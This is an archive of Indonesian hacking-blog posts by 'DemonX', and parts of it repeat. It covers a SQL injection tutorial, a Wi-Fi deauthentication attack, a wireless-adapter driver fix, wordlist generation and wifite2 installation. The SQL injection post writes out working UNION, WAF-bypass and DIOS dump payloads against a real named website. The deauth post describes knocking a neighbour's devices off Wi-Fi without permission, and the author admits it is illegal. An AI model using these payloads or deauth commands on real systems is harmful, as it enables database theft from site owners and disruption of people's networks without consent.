Rabu, 08 Juli 2020
Tutorial SQL Injection Manual Mudah
Halo guys, sekarang gua mau share tentang SQL manual. Bagi yang ga tau SQL Injection itu apa, SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data (database) sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter karakter pelolos yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. Ok langsung aja ke teknik nya
1. Dorking dulu
Nah bagi yang ga tau dork itu apa, google dork adalah fitur pencarian yang disediakan oleh google untuk mencari artikel yang berkaitan dengan query yang kita masukkan, nah dork yang umum adalah misalnya:
inurl: site.sch.id .php?id=
inurl: site.go.id php?id=
inurl: product.php?id=
Bagi yang ga tau cara dorking gimana :
Kalo udah tentuin dulu targetnya
Nah disini target gua seperti kemaren juga
https://mashailalqasr.com/eng/products.php?catid=1
Untuk mengecek nya, masukkan string ( ' ) dibelakangnya, Like this
https://mashailalqasr.com/eng/products.php?catid=1'
2. Order By
Terus kita cari jumlah kolomnya ada berapa dengan menambahkan order by dibelakangnya:
https://mashailalqasr.com/eng/products.php?catid=1' order by 1--+-
saat dilihat error, coba kita hapus ( ' ) dibelakang angka 1
https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+-
Dan hasilnya mulus, kita cari jumlah kolom nya lagi sampe nemu error, caranya;
https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 2--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 3--+- ~ Mulus
(Gua skip aja)
https://mashailalqasr.com/eng/products.php?catid=1 order by 36--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 37--+- ~ Nah ini Burik ini (error)
NB: kalo error di angka 40 dan angka 39 mulus, berarti jumlah kolom hanya sampai 39, kalo mau sekalian cek bisa di inject kolomnya atau ngga, langsung masukin aja order by 100 :v
Kolom 36 masih mulus, kita cek kolom 37
Nah ini burik namanya, langsung hantam aja!
3. Union Select
Caranya, tadi kan jumlah kolom hanya sampai 36, berarti kita masukin:
https://mashailalqasr.com/eng/products.php?catid=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Kalo udah, nanti bakal ada error not acceptable blablabla by mod_security, nah itu adalah WAF nya, hal itu biasa terjadi pas lagi mau inject target :v cara menembusnya pakai command ini:
Pengganti union select: /*!12345union*/+/*!12345select*/+
Jadinya kita masukin seperti Ini:
https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Result:
Nah, jangan lupa scroll ke bawah untuk liat angka togelnya, disitu angka togelnya adalah 5
Jadi yang kita pakai untuk ngintip basis data/database) nya terletak di angka 5. Langsung aja kita dump dengan menggunakan DIOS (Dump In One Shot)
DIOS: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
Jadinya seperti ini:
https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4, /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Nanti hasilnya seperti ini:
Untuk permisalan, gua mau dump, semisal gua mau dump tables banks nya :v
Ok, Sekian dulu kalo ada yang mau ditanyain silahkan di kolom komentar
Minggu, 05 Juli 2020
Teknik Penyerangan Terhadap Wi-Fi Dan Cara Menangkalnya #1
Bro? lu tau wifi kan? iya wifi sebagai Access Point internet seseorang. Ternyata bisa dibuat down juga oleh kita, bagaimana caranya? dan bagaimana mencegahnya? simak berikut ini:
1. Apa saja keamanan Wi-Fi?
Ada tiga protokol keamanan dalam jaringan WiFi, yaitu WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access), dan WPA2 (Wi-Fi Protected Access versi 2). Ada tiga aspek keamanan yang dapat diharapkan dari implementasi protokol keamanan, yaitu autentisitas (, integritas, dan kerahasiaan (confidentiality). Tapi tenang saja, itu semua bisa di tembus dengan beberapa persyaratan. Dan kalo persyaratannya sudah terpenuhi, siap siap "Tidak ada Wi-Fi yang aman" jangan lupa dibuat pansos juga ya, biar dibilang "Hekel plo, ampun stah" aowkwkwk:v
2. Persyaratan Supaya Berhasil
Sebenarnya ada 5-7 persyaratan, tapi disini gua jelasin 3 persyaratan yang paling ber efek supaya teknik penyerangan Wi-Fi berhasil:
> Jarak
Ya, yang pertama adalah jarak. Bukan jarak antara kita ya aowkwkw. Jarak yang gua maksud adalah jarak si peretas dengan AP (Access Point). AP disini yang gua maksud adalah sumber internet nya atau wifi nya sendiri
> Wireless Adapter
Yang kedua adalah wireless Adapter. Disini gua pake TP-Link WN722N, usahakan cari yang range nya jauh, karena ini juga menentukan peluang berhasil atau ngga!. Kenapa saya milih TP-Link? karena cari yang model alpha / Atheros disini susah, kaya nyari cewek yang cuma chatan sama satu cowok :v
Ini TP-Link yang gua pake:
Bagi kalian yang TP-Link nya error, bisa baca disini
> Prosesor minimal 3 / lebih
Yang terakhir adalah prosesor dengan jumlah minimal 3, prosesor ini bisa disetting di virtual box dengan settings -> processor -> Pilih minimal 3 / lebih. Kita akan membutuhkan banyak tab terminal baru untuk melakukan serangan. ok langsung ke caranya
3. Melakukan serangan
A. Setting wireless adapter ke mode monitor
Yang pertama harus kalian lakukan adalah memastikan Wireless Adapter dalam keadaan monitor, kalo tidak dalam keadaan monitor, ya ga bakal bisa nargetin lah :v
root@localhost:~# iwconfig wlan0 mode monitor
Karena interface gua adalah wlan0 makanya iwconfig wlan0, untuk mengecek nya ketik:
root@localhost:~# iwconfig
Setelah itu waktunya kita monitor, tapi sebelumnya jalankan airmon-ng dengan perintah:
B. Airmon-ng
root@localhost:~# airmon-ng start <interface anda>
root@localhost:~# airmon-ng start wlan0
Interface nya sesuaikan dengan interface kalian sendiri.
C. Airodump-ng
Selanjutnya adalah airodump-ng, ya command ini untuk monitoring jaringan disekitar kita, dengan cara:
root@localhost:~# airodump-ng <interface kalian yang sudah dalam keadaan monitor>
root@localhost:~# airodump-ng wlan0
Karena wlan0 saya sebelumnya sudah dalam keadaan monitor, sebenarnya tidak terlalu penting untuk menjalankan airmon-ng :v
D. Identifikasi dan tentukan target
Nah disini gua targetin dengan ESSID dengan nama "INDIRA" dia tetangga gua :v. ESSID adalah singkatan dari Service Set Identifier, fungsinya yaitu memberikan nama untuk wireless router maupun access point anda.
E. Menentukan Station Untuk Inject Client
Nah disini kalian harus menentukan client yang mau kalian track trace root nya. Dengan perintah:
root@localhost:~# airodump-ng wlan0 --bssid FC:A6:CD:82:EF:18 --channel 1
Seperti gambar:
--bssid : bssid adalah alamat dari Access Point dengan ESSID "INDIRA"
--channel : Channel ini adalah channel dari ESSID "INDIRA" dan ingat, channel ini BUKAN yang di sebelah kiri atas, kalo salah ya ga bakal bisa, lalu kita ENTER.
Station : adalah alamat dari client (Yang terhubung dengan Access Point)
BSSID : adalah alamat dari Access Point nya, lanjut lur.
F. Aireplay-ng
Disini gua bakal pake aireplay untuk deauth client, dengan perintah;
root@localhost:~# aireplay-ng --deauth 0 -c <station atau alamat client nya> -a <bssid Acces Pointnya> <interface anda yang dalam keadaan monitor>
Atau lebih jelasnya gini:
root@localhost:~# aireplay-ng --deauth 0 -c 58:5F:F6:4D:45:E1 -a FC:A6:CD:82:EF:18 wlan0
Karena ada 2 client yang terhubung, biar makin greget kita trace juga dua duanya :v
Nah proses deauth nya udah berjalan, dan target akan marah marah dalam hati wkwkwk, bagi yang ga tau deauth itu apa
DeAuth = Dead Authentication yang berarti memaksa client untuk memutus jaringan terhadap Access Point tanpa persetujuan dari client dan ini cukup greget :v
FYI: 10:05:44 Sending 64 directed DeAuth (code 7). STMAC: [58:5F:F6:4D:45:E1] [ 0| 2 ACKs]
Dibelakang kan ada [ 0| 2 ACKs] kalo angka depannya udah berubah jadi 0 itu berarti target sudah tidak ada sinyal sama sekali, saya jamin itu semua.
Untuk mengecek benar atau tidaknya coba jalankan airodump-ng sambil menjalankan aireplay-ng, seperti gambar:
Dan bisa dilihat di angka 0 yang saya block, power = 0 xixixi, pastikan kalian sudah dapet izin untuk melakukan pentest jaringannya, jangan kaya gua om, illegal wkwkwk. Jangan ditiru :v karena gua pentest tanpa sepengetahuan si pemilik, dan satu lagi jangan lupa dibuat pansos, karena dengan pansos mastah akan mengenalmu :v
4. Melakukan pengamanan
Ini berdasarkan pengalaman Wi-Fi sodara gua di jakarta yang pernah gua test sebagai percobaan dan sudah diberi izin oleh sodara gua, berikut caranya menghindari agar Wi-FI tidak mudah di retas:
1. Gunakan password yang susah
Hal ini adalah wajib hukumnya, agar peretas tidak bisa meretas capture data yang telah didapatkan di tangan hacker, gunakan kombinasi simbol, huruf besar, huruf kecil, angka dsb. seperti: &O!(^#**!^1137#&()!&r^#* ~ ini permisalan doang ya !
2. Aktifkan Network Encryption
Kalo gua cukup tidak terlalu pengaruh dengan enkripsi saat melakukan pentest. Tapi bagi yang pemula pasti kesulitan karena dulu saya juga seperti anda :v. Maksudnya Network Encryption itu apaan bos? seperti contoh WPA2 / WPA adalah network encryption dan dikombinasikan dengan password yang sulit
3. Buat lah pendek jangkauan WI-Fi anda
Semakin pendek jangkauan Wi-Fi anda, semakin lama peretas akan meretas Wi-Fi anda, untuk mengrim frames dan Beacons diperlukan jarak yang dekat. Disetiap ada kelebihan pasti ada kekurangan :)
sekian dari gua DemonX, jika ada yang mau ditanyakan silahkan hubungi gua
Kalo ada saran konten silahkan tulis di kolom komentar :v
Rabu, 01 Juli 2020
Kenapa TP-Link WN722N error saat Monitor mode? Berikut mengatasinya
Halo guys, back again bersama aing DemonX. Sekarang gua mau share ke kalian cara mengatasi Wireless USB Adapter TL-WN722N tidak bisa melakukan monitoring mode. Trouble nya seperti apa? Simak Lebih Lanjut.
1. Permasalahan
A. Tidak bisa monitor mode
Masalah yang pertama adalah tidak bisa monitor mode. Kalo ga bisa monitor mode, ya tidak bisa melakukan airodump-ng :v. Maka otomatis tidak bisa menjalankan tools yang lainnya, misal wifite, airgeddon, fluxion dll. kalo ga bisa monitor mode auto useless :v
B. Tidak bisa airodump-ng
Yang ke 2 adalah tidak bisa melakukan airodump-ng, kalo sudah begini apa yang mau dilakuin? hahaha :v
C. Tidak bisa melakukan aireplay-ng
Aireplay-ng berfungsi untuk melakukan deauth (Memutus sambungan Client ke Access Point), kalo kita mau melakukan handshake snooper, maka harus memutus client (yang terhubung) dengan Acces Point (AP) atau hotspot nya (Sumber wifi), begitu juga dengan wifiphisher
D. Phy Null saat melakukan monitoring
Ini lah core of the core dari permasalahan itu semua wkwkwk, yang harusnya phy berubah jadi phy0 atau phy1 tapi malah null (kosong)
2. pemecahan Masalah
FYI: Pastikan kalian masuk sebagai user root dengan perintah:
kali@kali:~$ sudo su
(lalu masukkan password kalian sendiri)
(nanti akan berubah menjadi)
root@namakalian:~#
1. Pastikan kernel linux anda versi 5.6.0 (yang terbaru)
yang pertama kernel kalian harus versi terbaru cara mengeceknya:
root@localhost:~# uname -r
karena kalo pakai kernel 5.5.0 bisa saja tidak work, kalo mau mendapatkan versi 5.6.0 upgrade dan update kali kalian dengan cara perintah:
root@localhost;~# apt-get update
root@localhost:~# apt-get upgrade
Kalo kernel kalian tidak bisa di upgrade, coba untuk install ulang OS kali Linux kalian di Virtual Box
2. :~# rmmod r8188eu.ko
Nah itu error karena saya udah hapus duluan tadi hehehe, kalo belom bakal mulus ga ada error apa", kalian hapus dulu file r8188eu.ko dengan perintah di atas agar nanti bisa kita install dengan 8188eu terbaru
3. echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf"
Nah kita blacklist r8188eu.ko supaya ga bikin error saat monitor mode, ingat ya itu disimpan di dalam folder /etc/modprobe.d/ dengan file bernama realtek.conf
4. :~# git clone https://github.com/aircrack-ng/rtl8188eus
Kalian install github nya dari link diatas lalu masuk ke directory nya dengan perintah
5. :~# cd rtl8188eus
Kalo sudah, kita lanjut lagi
6. :~/rtl8188eus# make
Make ini supaya yang dibutuhkan oleh driver kita tersedia di kali linux.
Karena saya udah make duluan, jadi langsung make [1]:leaving directory
7. :~rtl8188eus# make install
Nah ini berfungsi untuk installing ke dalam system kita (Pemasangan)
Nah nanti bakal keluar tulisan
install -p -m 644 8188eu.ko /lib/modules/5.6.0-kali2-amd64/kernel/drivers/net/wireless/
/sbin/depmod -a 5.6.0-kali2-amd64
8. :~/rtl8188eus# cd
Lalu kembali ke akses root kalian dan ketik perintah ini:
9. :~# modprobe 8188eu
Untuk menjalankan dari perintah "make" yang tadi agar berjalan karena r8188eu.ko sudah diganti dengan 8188eu
10. :~# airmon-ng check kill
Untuk mengecek apakah sudah bisa digunakan untuk kill PID
11. cabut dan pasang kembali TL-WN722N
Ini dilakukan supaya me refresh drivers, lakukan jeda sekitar 10 detik.
12, :~# ip link set wlan0 down
Ini supaya mencegah PID yang sudah di kill muncul lagi
13. :~# iw dev wlan0 set type monitor
Atau bisa juga kalian ketik
:~# iwconfig wlan0 mode monitor
lalu kalian cek dengan perintah
14. :~# iwconfig
Nah nanti bakal berubah dari mode managed ke mode monitor
15. :~# airodump-ng wlan0
Nah terakhir kalian ketik perintah diatas dan hasilnya:
Ok sekian dulu tutorial error Wireless adapter TP Link nya :v
kalo ada yang mau request untuk materi selanjutnya tulis di kolom komentar ea :v
Selasa, 30 Juni 2020
Cara Membuat Wordlist sendiri
Bro? Kalian sehat kan? Bagi yang pacaran semoga langgeng, dan bagi yang jomblo mari berkumpul ahahaha :v, back lagi di blog aing DemonX, setelah kemarin gua share tentang tutorial hack wifi, sekarang gua mau share lagi cara buat wordlist, nantinya wordlist ini bisa di custom sendiri oleh kalian. Langsung aja ke caranya
1. About cupp
Bentuk otentikasi yang paling umum adalah kombinasi nama pengguna dan kata sandi atau frasa sandi. Jika kedua nilai kecocokan disimpan dalam tabel yang disimpan secara lokal, pengguna diautentikasi untuk koneksi. Kekuatan kata sandi adalah ukuran dari kesulitan dalam menebak atau menghancurkan kata sandi melalui teknik kriptografi atau pengujian otomatis nilai-nilai alternatif yang berbasis perpustakaan.
Kata sandi yang lemah mungkin sangat pendek atau hanya menggunakan karakter alfanumerik, membuat dekripsi menjadi sederhana. Kata sandi yang lemah juga bisa menjadi kata yang mudah ditebak oleh seseorang yang membuat profil pengguna, seperti ulang tahun, nama panggilan, alamat, nama hewan peliharaan atau kerabat, atau kata umum seperti Tuhan, cinta, uang atau kata sandi.
Itulah mengapa CUPP lahir, dan dapat digunakan dalam situasi seperti tes penetrasi hukum atau investigasi kejahatan forensik.
2. Installasi Cupp
Disini pertama tama kalian cloning tools githubnya https://github.com/Mebus/cupp :
root@localhost:~# git clone https://github.com/Mebus/cupp
Kalo udah kalian masuk ke directory nya
root@localhost:~# cd cupp
root@localhost:~/cupp# ls (Untuk Nampilkan List)
Selanjutnya kalian berikan akses ke file cupp.py dengan ketik perintah
root@localhost:~/cupp# chmod +x cupp.py
Dan terakhir kalian jalankan perintah
root@localhost:~/cupp# ./cupp.py -i
kalian isi List nya sesuai keinginan kalian
Example:
Nanti hasilnya akan di simpan di dalam folder cuppnya
kalo mau liat tinggal kalian ketik ls
3. About Mentalist
Mentalist adalah alat grafis untuk pembuatan daftar kata kustom. Itu menggunakan paradigma manusia umum untuk membangun kata sandi dan dapat menampilkan daftar kata lengkap serta aturan yang kompatibel dengan Hashcat dan John the Ripper.
4. Installasi mentalist
Yang ke empat kita install mentalist nya lewat github:
Remember: Kalian Install Lagi diluar directory cupp
root@localhost:~/cupp# cd (cd doang ya lur)
root@localhost:~# git clone https://github.com/sc0tfree/mentalist.git
Terus kalian masuk ke dalam folder mentalist nya
root@localhost:~# cd mentalist
root@localhost:~mentalist# ls
Nah saat kalian ketik "ls" pasti bakal ada file setup.py, kalian install setup.py dengan perintah:
root@localhost:~/mentalist# python3 setup.py install
Kalo udah, kalian tinggal ketik
root@localhost;~/mentalist# mentalist
kalo udah, bakal muncul window baru dari mentalist nya
Nah tinggal kalian custom sendiri, caranya kalian klik ikon + di sebelah base word,Like This:
Disitu kalian klik ikon + di sebelah base words dan terserah kalian mau bikin apa aja xixixi
Kalo mau tambah attribute, kalian klik icon + di kanan atas, yang sudah saya custom:
kalo udah siap, tinggal di save, klik di kanan atas "Load/Save"
Kalian tentukan dulu letak gambarnya, kalo gua sih mau save di file cupp, caranya kalian klik tanda minus di atas nya dan tentuin letak nya
kalo udah tinggal klik save dan saya coba cek di directory cupp nya:
Dan BBBOOOOOMMMMMM!!!!1
Selanjutnya terserah kalian mau digunakan untuk apa wordlistnya xixixi
Segitu dulu dah bikin wordlist nya yang mudah :v kalo mau dibikin manual ya gak papa hehehe
Kalo ada yang mau ditanyain tulis di kolom komentar ya
1. About cupp
Bentuk otentikasi yang paling umum adalah kombinasi nama pengguna dan kata sandi atau frasa sandi. Jika kedua nilai kecocokan disimpan dalam tabel yang disimpan secara lokal, pengguna diautentikasi untuk koneksi. Kekuatan kata sandi adalah ukuran dari kesulitan dalam menebak atau menghancurkan kata sandi melalui teknik kriptografi atau pengujian otomatis nilai-nilai alternatif yang berbasis perpustakaan.
Kata sandi yang lemah mungkin sangat pendek atau hanya menggunakan karakter alfanumerik, membuat dekripsi menjadi sederhana. Kata sandi yang lemah juga bisa menjadi kata yang mudah ditebak oleh seseorang yang membuat profil pengguna, seperti ulang tahun, nama panggilan, alamat, nama hewan peliharaan atau kerabat, atau kata umum seperti Tuhan, cinta, uang atau kata sandi.
Itulah mengapa CUPP lahir, dan dapat digunakan dalam situasi seperti tes penetrasi hukum atau investigasi kejahatan forensik.
2. Installasi Cupp
Disini pertama tama kalian cloning tools githubnya https://github.com/Mebus/cupp :
root@localhost:~# git clone https://github.com/Mebus/cupp
Kalo udah kalian masuk ke directory nya
root@localhost:~# cd cupp
root@localhost:~/cupp# ls (Untuk Nampilkan List)
Selanjutnya kalian berikan akses ke file cupp.py dengan ketik perintah
root@localhost:~/cupp# chmod +x cupp.py
Dan terakhir kalian jalankan perintah
root@localhost:~/cupp# ./cupp.py -i
kalian isi List nya sesuai keinginan kalian
Example:
Nanti hasilnya akan di simpan di dalam folder cuppnya
kalo mau liat tinggal kalian ketik ls
3. About Mentalist
Mentalist adalah alat grafis untuk pembuatan daftar kata kustom. Itu menggunakan paradigma manusia umum untuk membangun kata sandi dan dapat menampilkan daftar kata lengkap serta aturan yang kompatibel dengan Hashcat dan John the Ripper.
4. Installasi mentalist
Yang ke empat kita install mentalist nya lewat github:
Remember: Kalian Install Lagi diluar directory cupp
root@localhost:~/cupp# cd (cd doang ya lur)
root@localhost:~# git clone https://github.com/sc0tfree/mentalist.git
Terus kalian masuk ke dalam folder mentalist nya
root@localhost:~# cd mentalist
root@localhost:~mentalist# ls
Nah saat kalian ketik "ls" pasti bakal ada file setup.py, kalian install setup.py dengan perintah:
root@localhost:~/mentalist# python3 setup.py install
Kalo udah, kalian tinggal ketik
root@localhost;~/mentalist# mentalist
kalo udah, bakal muncul window baru dari mentalist nya
Nah tinggal kalian custom sendiri, caranya kalian klik ikon + di sebelah base word,Like This:
Disitu kalian klik ikon + di sebelah base words dan terserah kalian mau bikin apa aja xixixi
Kalo mau tambah attribute, kalian klik icon + di kanan atas, yang sudah saya custom:
kalo udah siap, tinggal di save, klik di kanan atas "Load/Save"
Kalian tentukan dulu letak gambarnya, kalo gua sih mau save di file cupp, caranya kalian klik tanda minus di atas nya dan tentuin letak nya
kalo udah tinggal klik save dan saya coba cek di directory cupp nya:
Dan BBBOOOOOMMMMMM!!!!1
Selanjutnya terserah kalian mau digunakan untuk apa wordlistnya xixixi
Segitu dulu dah bikin wordlist nya yang mudah :v kalo mau dibikin manual ya gak papa hehehe
Kalo ada yang mau ditanyain tulis di kolom komentar ya
Rabu, 24 Juni 2020
Information Gathering dengan Blue Thunder
Halo guys, sekarang gua mau share tentang Blue Thunder Tools. Tools ini untuk melacak dan memberikan informasi tentang suatu address. Ok Demon mau basa basi dulu
1. About Blue Thunder
Ambil informasi tentang alamat ip atau nama host Alat ini ditulis dalam bentuk perl karena Anda dapat memberi tahu -_- Anda dapat membantu kami dengan berlangganan ke saluran youtube kami:. https://goo.gl/FpAkp5.: sebelum membuka alat gunakan perintah ini chmod + x blue_thunder_IP_locator.pl tidak ada yang istimewa itu hanya memberikan informasi dari situs web ini http://ip-api.com/ periksa terima kasih telah menggunakan alat kami.
Dikutip dari Developer: the shadow brokerss
2. Installasi Tools
A. root@localhost:~# apt install liblocal-lib-perl libjson-perl
Nah antara package yang satu dengan seterusnya dikasih spasi ya lur :v
FYI: Jangan lupa pakai perintah "sudo" sebagai akses root, atau kalo ga mau ribet ngetik "sudo" langsung masuk ke root nya dengan perintah "sudo su" jadi yang sebelumnya kalian ketik "sudo apt-get ...." langsung menjadi "apt-get ....."
B. root@localhost:~# apt-get upgrade libjson-perl
NB: Untuk Termux sama saja penginstallannya
C. root@localhost:~# git clone https://github.com/theshadowbrokerss/Blue-Thunder-IP-Locator-
Dan Kalo sudah, kalian masuk ke directory nya dengan ketik perintah:
root@localhost:~# cd Blue-Thunder-IP-Locator-
Dan ketik perintah "ls" untuk menampilkan list
beri akses untuk file blue_thunder.py dengan ketik perintah
root@localhost:~# chmod +x blue_thunder.py
Kalo kalian ga mau ribet, cukup ketik perintah:
root@localhost:~# chmod +x *
D. Running script
Kalo kalian ga mau kasih akses yang lebih mudah, kalian harus jalankan sesuai bahasanya, karena menggunakan bahasa perl makanya format file .pl
root@localhost:~# perl blue_thunder.pl
E. Menentukan Target
Untuk nentuin target ada banyak cara, tapi gua disini bakal menggunakan lbd (Tools Bawaan kali)
root@localhost:~# lbd www.detik.com
Nanti bakal keluar IP Server
Checking for DNS-Loadbalancing: FOUND
detik.com has address 103.49.221.211
detik.com has address 203.190.242.211
Checking for HTTP-Loadbalancing [Server]:
dtk24
dtk10
FOUND
Checking for HTTP-Loadbalancing [Date]: 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:42, 08:54:42, 08:54:42, 08:54:42, 08:54:42, NOT FOUND
Checking for HTTP-Loadbalancing [Diff]: FOUND
< Server: dtk24
> Server: dtk10
detik.com does Load-balancing. Found via Methods: DNS HTTP[Server] HTTP[Diff]
kalo server nya ga ke detect, cari target lain :v
dtk24 IP Server: 103.49.221.211
dtk10 IP Server: 203.190.242.211
bebas mau yang mana aja, tapi gua mau scan yang depannya 103
root@localhost:~# perl blue_thunder.py 103.49.221.211
Dan Enter
3. Google Maps
Nanti bakal keluar geo lat dan geo longitude dan kalian pastekan di google maps like this
Ok lur, itu aja yang mau gua share. kalo ada yang mau ditanyain, tulis di kolom komentar ya
1. About Blue Thunder
Ambil informasi tentang alamat ip atau nama host Alat ini ditulis dalam bentuk perl karena Anda dapat memberi tahu -_- Anda dapat membantu kami dengan berlangganan ke saluran youtube kami:. https://goo.gl/FpAkp5.: sebelum membuka alat gunakan perintah ini chmod + x blue_thunder_IP_locator.pl tidak ada yang istimewa itu hanya memberikan informasi dari situs web ini http://ip-api.com/ periksa terima kasih telah menggunakan alat kami.
Dikutip dari Developer: the shadow brokerss
2. Installasi Tools
A. root@localhost:~# apt install liblocal-lib-perl libjson-perl
Nah antara package yang satu dengan seterusnya dikasih spasi ya lur :v
FYI: Jangan lupa pakai perintah "sudo" sebagai akses root, atau kalo ga mau ribet ngetik "sudo" langsung masuk ke root nya dengan perintah "sudo su" jadi yang sebelumnya kalian ketik "sudo apt-get ...." langsung menjadi "apt-get ....."
B. root@localhost:~# apt-get upgrade libjson-perl
NB: Untuk Termux sama saja penginstallannya
C. root@localhost:~# git clone https://github.com/theshadowbrokerss/Blue-Thunder-IP-Locator-
Dan Kalo sudah, kalian masuk ke directory nya dengan ketik perintah:
root@localhost:~# cd Blue-Thunder-IP-Locator-
Dan ketik perintah "ls" untuk menampilkan list
beri akses untuk file blue_thunder.py dengan ketik perintah
root@localhost:~# chmod +x blue_thunder.py
Kalo kalian ga mau ribet, cukup ketik perintah:
root@localhost:~# chmod +x *
D. Running script
Kalo kalian ga mau kasih akses yang lebih mudah, kalian harus jalankan sesuai bahasanya, karena menggunakan bahasa perl makanya format file .pl
root@localhost:~# perl blue_thunder.pl
E. Menentukan Target
Untuk nentuin target ada banyak cara, tapi gua disini bakal menggunakan lbd (Tools Bawaan kali)
root@localhost:~# lbd www.detik.com
Nanti bakal keluar IP Server
Checking for DNS-Loadbalancing: FOUND
detik.com has address 103.49.221.211
detik.com has address 203.190.242.211
Checking for HTTP-Loadbalancing [Server]:
dtk24
dtk10
FOUND
Checking for HTTP-Loadbalancing [Date]: 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:35, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:36, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:37, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:38, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:39, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:40, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:41, 08:54:42, 08:54:42, 08:54:42, 08:54:42, 08:54:42, NOT FOUND
Checking for HTTP-Loadbalancing [Diff]: FOUND
< Server: dtk24
> Server: dtk10
detik.com does Load-balancing. Found via Methods: DNS HTTP[Server] HTTP[Diff]
kalo server nya ga ke detect, cari target lain :v
dtk24 IP Server: 103.49.221.211
dtk10 IP Server: 203.190.242.211
bebas mau yang mana aja, tapi gua mau scan yang depannya 103
root@localhost:~# perl blue_thunder.py 103.49.221.211
Dan Enter
3. Google Maps
Nanti bakal keluar geo lat dan geo longitude dan kalian pastekan di google maps like this
Ok lur, itu aja yang mau gua share. kalo ada yang mau ditanyain, tulis di kolom komentar ya
Senin, 22 Juni 2020
Tutorial Hack Wifi dengan Wifite2
Hallo guys, sekarang aing mau share tentang cara Hack Wifi dengan tools Wifite2. Supaya kalian bisa monitoring mode nya, harus pakai Wifi Adapter. kalo pake wireless compat doang mah ya ga bisa, kalo mau berhasil harus ada usaha A6. carding misalnya aowkwkwkw. Nah disini gua sih pake TL WN722N sebagai wlan0 nya. Kalo ga ada wireless adapter nya gimana Demon? ya ga bisa monitor mode.
1. About Wifite
Repo ini adalah penulisan ulang lengkap wifite, skrip Python untuk mengaudit jaringan nirkabel.
Wifite menjalankan alat audit nirkabel yang ada untuk Anda. Hentikan menghafal argumen perintah & beralih!
Wifite dirancang untuk menggunakan semua metode yang dikenal untuk mengambil kata sandi dari titik akses nirkabel (router). Metode-metode ini meliputi:
WPS: Serangan Offline Pixie-Dust
WPS: Serangan PIN Brute-Force Online
WPA: Tangkapan Jabat Tangan WPA + celah offline.
WPA: Retakan Hash PMKID + luring offline.
WEP: Berbagai serangan yang diketahui terhadap WEP, termasuk fragmentasi, chop-chop, aireplay, dll.
Jalankan wifite, pilih target Anda, dan Wifite akan secara otomatis mulai mencoba menangkap atau memecahkan kata sandi.
2. Installasi
A. Tools Pendukung
Sebelumnya, kalian harus install beberapa tools dibawah ini sebagai pendukung yang hukumnya fardu ain :v
tshark: Untuk mendeteksi jaringan WPS dan memeriksa file pengambilan jabat tangan.
reaver: Untuk serangan WPS Pixie-Dust & brute-force.
Catatan: Alat cuci Reaver dapat digunakan untuk mendeteksi jaringan WPS jika tshark tidak ditemukan.
bully: Untuk serangan WPS Pixie-Dust & brute-force.
Alternatif untuk Reaver. Tentukan --bully untuk menggunakan Bully, bukan Reaver.
Bully juga digunakan untuk mengambil PSK jika reaver tidak dapat setelah memecahkan PIN WPS.
coWPAtty: Untuk mendeteksi tangkapan jabat tangan.
pyrit: Untuk mendeteksi tangkapan jabat tangan.
hashcat: Untuk memecahkan hash PMKID.
hcxdumptool: Untuk mengambil hash PMKID.
hcxpcaptool: Untuk mengkonversi paket PMKID ke dalam format hashcat.
FYI: Yang belum di install di Kali adalah hcxdumptool dan hcxpcaptool
hcxdumptool: https://github.com/ZerBea/hcxdumptool
hcxpcaptool: https://github.com/ZerBea/hcxtools
Jalankan dengan perintah:
kali@kali:~$ sudo git clone (link diatas) ~tidak sebagai super user (root)
root@localhost:~# git clone (link diatas) ~sebagai super user (root)
B. Install github
Untuk install github nya:
:~# git clone https://github.com/derv82/wifite2
:~# cd wifite2
